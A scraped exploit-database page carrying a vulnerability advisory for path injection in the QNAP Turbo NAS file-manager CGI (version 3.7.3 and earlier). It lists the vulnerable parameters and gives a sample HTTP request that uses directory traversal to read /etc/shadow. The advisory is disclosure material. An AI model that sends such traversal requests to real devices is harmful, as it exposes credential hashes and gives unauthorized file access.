0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

QNAP Turbo NAS 3.7.3 File Disclosure

Author

Andrea Fabrizi

Risk

[

Security Risk Medium

]

0day-ID

Category

Date add

Platform

**************************************************************
Vulnerability: Multiple Path Injection
Product: QNAP Turbo NAS
Vendor: QNAP
Version affected: <= 3.7.3 build 20120801
Status: Unpatched
Website: http://web.qnap.com/pro_detail_feature.asp?p_id=202
Discovered by: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
**************************************************************

This vulnerability has been discovered on QNAP TS-1279U-RP, but probably
other products that use the same firmware may be affected.

The CGI "/cgi-bin/filemanager/utilRequest.cgi" is prone to a path
injection, which makes it possible,
for authenticated users, to access, delete o modify any file, included
system files, configuration files and
files owned by other users.

Due to the single user configuration of the embedded linux system, it
is possible to access
any system file without restrictions (included /etc/shadow, that
contains the hash of the administrator password).

Vulnerable parameters are (the list is not exhaustive):
/cgi-bin/filemanager/utilRequest.cgi [source_file]
/cgi-bin/filemanager/utilRequest.cgi?func=delete [file_name]
/cgi-bin/filemanager/utilRequest.cgi?func=copy [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=move [dest_path]
/cgi-bin/filemanager/utilRequest.cgi?func=get_acl_properties [name]

Sample HTTP request:
###########################################################
POST /cgi-bin/filemanager/utilRequest.cgi/test.txt HTTP/1.1
Host: 192.168.0.10
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

isfolder=0&func=download&sid=12345abc&source_total=1&source_path=/myFiles&source_file=../../../etc/shadow
###########################################################



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

QNAP Turbo NAS 3.7.3 File Disclosure

Report Error

Report Error